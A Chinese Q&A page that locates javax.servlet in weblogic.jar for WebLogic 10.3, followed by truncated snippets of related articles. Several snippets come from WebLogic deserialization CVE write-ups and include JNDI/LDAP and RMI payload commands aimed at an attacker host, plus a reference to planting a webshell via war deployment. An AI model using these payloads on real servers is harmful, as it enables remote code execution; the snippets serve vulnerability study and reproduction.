WebLogic Jar在10.3中包含javax.servlet在哪里？

在 WebLogic 10.3 中，javax.servlet 包含在 weblogic.jar 文件中。weblogic.jar 文件位于 WebLogic Server 的安装目录中的 server/lib 子目录下。

例如，在默认安装的情况下，weblogic.jar 文件的路径可能是：

/opt/weblogic/wlserver/server/lib/weblogic.jar

在该 JAR 文件中，您可以找到 javax.servlet 包，其中包含了许多与 Servlet 相关的类和接口。

推荐的腾讯云相关产品和产品介绍链接地址：

相关·内容

Apache CXF 在 WebLogic 9.2 上的问题定位分析及权宜之计

包含有这个类而 WebLogic 9.2 中的则有两个 .jar 文件包含有此类： No.1 Jar Package:%WLS_HOME%/server/lib/api.jar No.2...Jar Package:%WLS_HOME%/server/lib/weblogic.jar 经过对比，WebLogic 9.2 里的两个 .jar 文件里带个类是一样的，况且，正常启动时 WebLogic...OK，现在首先想到的是在 weblogic.xml 设置 prefer-web-inf-classes 为 true 来提前加载了。如下： <?...继续 JarClassFind ，在 Apache CXF 里找到 stax-api-1.0.1.jar 包含有这个类。...Apache CXF 的时间晚于 WebLogic 里的类的时间，于是只能怀疑后者引起类在加载时发生了 java.lang.LinkageError 错误。

8892 0

修复weblogic的JAVA反序列化漏洞的多种方法

可通过搜索代码查找weblogic的jar包中是否包含特定的JAVA类；在调用weblogic的停止脚本时，会向weblogic发送JAVA序列化数据；可通过ObjectInputStream.readObject...组件 breenmachine在文章中写到可以通过搜索代码的方式查找weblogic的jar包中是否包含特定的JAVA类。.../features/weblogic.server.merged.jar 由于weblogic 9.2未包含TransformedMap类，因此无法触发反序列化漏洞，weblogic 10g、weblogic...“weblogic.rjvm.t3.MuxableSocketT3”，不同版本的weblogic的该类在不同的jar包中，查找某个类所在的jar包的方法见前文“确定weblogic是否使用了Apache...在定位到“weblogic.rjvm.t3.MuxableSocketT3”类所在的weblogic的jar包后，对其进行反编译，将对应的jar包加入到创建的java工程的classpath中。

9151 0

Web-第三十二天 WebLogic中间件【悟空教程】

它只包含了安装和运行WebLogic服务器的必要文件, 此包也不包含 Oracle Coherence 或者Oracle Enterprise pack for Eclipse 1.1.8....开发模式是比较自由的，它保证开发灵活性，随便把它扔哪里都会自动更新，这样会影响速度。一般地开发好的产品，都给客户用产品模式部署 ? 20. 选择可选配置 ? 21. 显示了配置概要 ? 22....Coherence：在可靠的、高度可伸缩的对等集群协议之上提供了复制的、分布式的（分区的）数据管理和缓存服务 Logs：系统日志目录 Modules: weblogic运行时需要的jar文件 user_projects...一个域中包含一台或多台 WebLogic Server，也可以包含 WebLogic Server 群集。域是由单个管理服务器管理的 WebLogic Server 实例的集合 ? 1.1.16....//DTD Web Application 8.1//EN" "http://www.bea.com/servers/wls810/dtd/weblogic810-web-jar.dtd"><weblogic-web-app

3.6K4 0

IDEA怎么远程调试应用？

0x01 前言一直在纠结有没有必要写这一章的内容，毕竟网上有挺多现成的，但是为了系列文章的完整性，还是写一写。...,server=y,suspend=n,address=8000 -jar test.jar 而对于tomcat下的应用来说，只需要到tomcat的bin目录下运行....在同文件中还可以找到应用是调试端口是哪一个,当然，weblogic运行时，在控制台也打印出来了，如果你不清楚某个引用的默认调试端口，你甚至可以百度一下~ ?...具体操作如下，以weblogic为例，我要把weblogic中的一些关键jar包加到lib中： ? ?...然后选择对应的目录就行了，一般就是把包含jar包的目录加进来,添加完过后就可以在IDEA中访问到很多jar包了，并且IDEA会自动反编译这些jar包中的class文件，我们还可以在对应的文件处下断点，然后就可以开始愉快的调试了

1.8K1 0

Weblogic运维使用手册

=/usr/local/jdk1.6.0_27 export PATH=$JAVA_HOME/bin:$PATH 2.将weblogic软件“wls1033_generic.jar”拷贝至weblogic...家目录/weblogic（软件安装目录）执行 java -jar -d64 wls1033_generic.jar 本例以控制台方式安装（weblogic安装模式有三种：图形化、控制台、无人守护） java...-D64 -jar wls1035_generic.jar –mode=console 控制台安装 java -jar wls1034_generic.jar -mode=console -silent_xml...（口令至少必须为 8 个字母数字字符, 且至少包含一个数字或一个特殊字符。）...文件，写入用户名密码： username=weblogic password=weblogic123 在/weblogic/Oracle/Middleware/user_projects/domains

3.2K2 2

CVE-2021-2109：Weblogic远程代码执行分析复现

下载 weblogic 安装包后，以管理员身份打开cmd控制台执行完下面命令后，一路next就好 java -jar fmw_12.2.1.4.0_wls_lite_generic.jar 安装完成之后...com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.176;1:1389/pq2ld0;AdminServer%22) 0x06 漏洞分析我们注意到漏洞poc中包含类...我们在 JNDIBindingAction 类的函数 execute 中，看到了 JNDI 注入的关键函数 lookup，通过 lookup 去引用命名服务(RMI)和目录服务(LDAP) console.jar...跟进lookupServer com.oracle.weblogic.management.beanimpls.jar!...this.objectIdentifier 是在 JndiBindingHandle 类中的构造函数中初始化的。 console.jar!

3.6K1 0

weblogic EJB 学习

另外,bean作者可以增加另外一个cmp配置描述文件 weblogic-cmp-rdbms.xml,其中包含数据库表名和每个容器管理的字段和相应的数据列的映射....> （2）weblogic-ejb-jar.xml (注释) HelloWorld...> 4 ....（配置描述器） META-INF/weblogic-ejb-jar.xml（weblogic服务器配置描述器）说明： META-INF 必须为大写 5 ....RequiresNew 在调用相应的EJB之前,开始一个新的事务,当方法调用返回时,即提交这个事务. 6、ejb 引用在ejb－jar.xml

1.3K2 0

Solaris 10 SPARC WebLogic JSP编译错误解决

forumID=81&threadID=37385 Solaris 10 SPARC WebLogic 8.1.5下 Spring 1.2.8 Hibernate 3.1.3 出现JSP编译错误同样在...] Results: No.1 Jar Package:D:\BEA\WebLogic81\server\lib\weblogic.jar antlr/CommonToken.class Find Process...Total Results:1 2、分析配置文件由于我在weblogic.xml里设置前加载 true 而且我的WEB-INF\lib\下有antlr-2.7.6rc1.jar的包，于是冲突了！...导致ClassCastException 三、解决方法： 1、去掉前加载的配置； 2、去掉应用WEB-INF\lib\下的包含antlr.CommonToken类的antlr-2.7.6rc1.jar

5694 0

EJB 学习笔记

另外,bean作者可以增加另外一个cmp配置描述文件 weblogic-cmp-rdbms.xml,其中包含数据库表名和每个容器管理的字段和相应的数据列的映射. bean管理持久性（Bean－Managerd...> （2）weblogic-ejb-jar.xml (注释) HelloWorld（...> 4 ....（配置描述器） META-INF/weblogic-ejb-jar.xml（weblogic服务器配置描述器）说明： META-INF 必须为大写 5 ....RequiresNew 在调用相应的EJB之前,开始一个新的事务,当方法调用返回时,即提交这个事务. 6、ejb 引用在ejb－jar.xml

5492 0

Weblogic渗透测试指南

这样就可以顺利登录到网站后台了，然后就是部署一个包含自己马的war包（没有jsp马的我默默问大佬要了个马 linux下可以直接用命令打包war包 1 jar -cvf [war包名] [目录名] ?...XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。...复现的时候有几个小问题，JRMP Server的ip需要填本地主网卡（用于上网的那个）的ip 然后在物理机上攻击虚拟机中映射出来的docker环境不知道为什么没有成功以及自己在虚拟机上搭建的weblogic10.3.6...https://github.com/jas502n/CVE-2018-3191 需要先生成一个payload java -jar weblogic-spring-jndi-10.3.6.0.jar...rmi://攻击机ip:端口/exp > payload java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://172.20.0.1:8888/exp >

1.8K4 0

Linux下配置Weblogic环境连接数据库的Bug

javax.naming.NoInitialContextException: Cannot instantiate class: weblogic.jndi.WLInitialContextFactory...[Root exception is java.lang.ClassNotFoundException: weblogic.jndi.WLInitialContextFactory] 将WebLogic.jar...可是在执行时发现报错：一：不自动识别jar为classes需要手动 Exception in thread "main" java.lang.NoClassDefFoundError: weblogic...: weblogic/security/acl/UserInfo 在Linux环境下，Oracle已经改变了weblogic包路径的内容，不能再像以前那样直接引用weblogic.jar.需要用到Weblogic...wlfullclient.jar包 java -jar wljarbuilder.jar 3、将创建的wlfullclient.jar添加到你的应用程序的Add to library下就可以了。

1.4K3 0

CVE-2020-14644 weblogic iiop反序列化漏洞

CVE-2020-14644 weblogic iiop反序列化漏洞 0x00 weblogic 受影响版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0,...2、生成wlfullclient.jar包安装weblogic_server可以参考https://blog.csdn.net/qq_36868342/article/details/79967606...wlfullclient可以通过，在安装完weblogic服务以后，来到~/Oracle/Middleware/Oracle_Home/wlserver/server/lib目录，运行java -jar...这个wlfullclient.jar包包含了weblogic的基本所有功能类。 3、在IDEA新建一个工程文件。...一种是反射来修改，一种是看abClass是在哪里复制的。

8213 0

远程调试docker构建的weblogic

1.5K3 0

测试环境搭建——Spring Boot 部署

，在进行打包时，会动态生成jar的启动类org.springframework.boot.loader.JarLauncher，借助该类对Spring Boot 应用程序进行启动。...上）；部署较为困难（比如和weblogic有较多的类冲突）。...注： Jar的相关依赖信息、包名称等等在pom文件中进行设置。部署将打包后的文件放置在部署服务器的指定目录下，并设置指定权限，在该目录下编辑启动脚本start.sh： #!...包并写入日志nohup java -jar $APP_NAME >>logs/start.log 2>>logs/startError.log & #sleep等待15秒后，判断包含AppName的线程是否存在.../bin/sh #指定AppNameAPP_NAME=demo-0.0.1.jar #找到包含AppName的进程PROCESS=`ps -ef|grep $APP_NAME|grep -v grep

6162 0

maven依赖中scope=compile和provided区别

只在测试时使用，用于编译和运行测试代码。不会随项目发布。...system跟provided 相似，但是在系统中要以外部JAR包的形式提供，maven不会在repository查找它解释：对于scope=compile的情况（默认scope),也就是说这个项目在编译...做一个实验就可以很容易发现，当我们用maven install生成最终的构件包ProjectABC.war后，在其下的WEB-INF/lib中，会包含我们被标注为scope=compile的构件的jar...包，而不会包含我们被标注为scope=provided的构件的jar包。...今天开发web的时候，需要用到servlet-api，于是在pom.xml中添加依赖 javax.servlet <artifactId

2.4K2 0

CVE-2018-2628补丁绕过分析与修复建议

一、漏洞背景 Oracle官方在北京时间2018年4月18日凌晨发布了关键补丁更新，其中包含了OracleWebLogic Server的一个高危反序列化漏洞（CVE-2018-2628），通过该漏洞，...CVE-2018-2628为CVE-2017-3248修复版本的绕过，远程攻击者可利用该漏洞在未授权的情况下发送攻击数据，通过T3协议在Weblogic Server中执行反序列化操作，利用RMI（远程方法调用...而新增的黑名单sun.rmi.server.UnicastRef虽然在payload中使用，但并未包含在反射链中。因此，补丁所希望起到的RMI远程反序列化修复效果并未生效，该漏洞仍可绕过。 ? ?...b）在连接筛选器中输入：weblogic.security.net.ConnectionFilterImpl，在连接筛选器规则中输入：127.0.0.1 allow t3 t3s，0.0.0.0/0 deny...”，编译并更新swlclient.jar、wlthint3client.jar这两个用到该类的包[4]。

1.1K4 1

【漏洞分析】Weblogic反序列化漏洞分析（CVE-2021-2394）

/modules/com.bea.core.jarbuilder.jar将在lib目录下生成一个wlfullclient.jar包，该jar包包含了weblogic的基本所有功能类，用于IIOP协议发包...，有效解决了jar包冲突问题添加依赖包，经过测试，需要添加的包如下图，均可在weblogic的安装目录下找到这里选择本地调试，输出序列化文件再调用readObject()即可 0x03 漏洞分析...IIOP协议发包我是直接参考了Y4er师傅的CVE-2020-2551的POC（见参考链接），POC中提到的需要添加weblogic.jar包，我在12.2.1.3.0中测试，发现不太行，缺少一些依赖（...找不到IIOP协议等错误），对比10.3.6.0的weblogic.jar包，12.2.1.3.0是缺少了挺多类的，因此我去添加了一些其他的同目录下用于数据传输的包，效果不太理想，不同包之间会有比较大的冲突...（其实Y4er师傅的jar包也使用了这个jar包，我当时没多注意: ( 导致浪费了很多时间）。此外，在我放到github的POC中，利用IIOP协议发包的时候，我有一些奇奇怪怪的东西没删掉。

1.6K2 0

linux 安装weblogic12.1.3.0步骤

————文件内容结束————— （3）开始安装，命令：java -jar fmw_12.1.3.0.0_wls.jar -silent -responseFile /home/weblogic...-jar fmw_12.1.3.0.0_wls.jar -silent -responseFile /home/weblogic/response/wls.rsp -invPtrLoc /home/weblogic...建议案: 确保在正确的平台上安装软件。警告: 检查:CertifiedVersions 失败。...（2）创建一个脚本createdomain.py（在该目录下 /home/weblogic/Oracle/Middleware/wlserver/common/bin）以下为文件内容： readTemplate...("/home/weblogic/Oracle/Middleware/wlserver/common/templates/wls/wls.jar") cd("Servers/AdminServer")

6.2K5 0

MAVEN使用说明

– Servlet –> javax.servlet provided javax.servlet...只是这个不是默认的，无法执行到，我找了半天也没有找到在哪里可以改。。也可能根本就不能改！...2.在CMD中 mvn clean package jboss:hard-deploy 这就可以了。...比如上面这个的JAR文件就是：mysql-connector-java-5.1.2.jar 必须的：）想要自己加个包时就这么搞就行了。

1.9K2 0

CVE-2020-14645：Weblogic远程代码执行复现

mvn 好像不能下载coherence包，很奇怪，直接下jar包就行。反序列化的对象，通过t3发送给weblogic即可。所以，这个只是生成payload的工具。...Version < JDK6u211/7u201/8u191 Weblogic Version 12.2.1.4.0 在官网下载上面的安装包安装好对应JAVA并配置好环境变量，java javac命令可以执行...使用管理员权限打开CMD执行安装命令 java -jar fmw_12.2.1.4.0_wls_lite_generic.jar ? 无脑下一步 ? ? 稍等片刻会自动打开配置向导，下一步 ?...使用下面的工具 (需要mvn编译) ，工具下载地址 https://github.com/DSO-Lab/Weblogic_CVE-2020-14645 java -jar CVE-2020-14645....jar LDAP服务器IP:port/#exp http://192.168.132.171:7001 ?

1K2 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云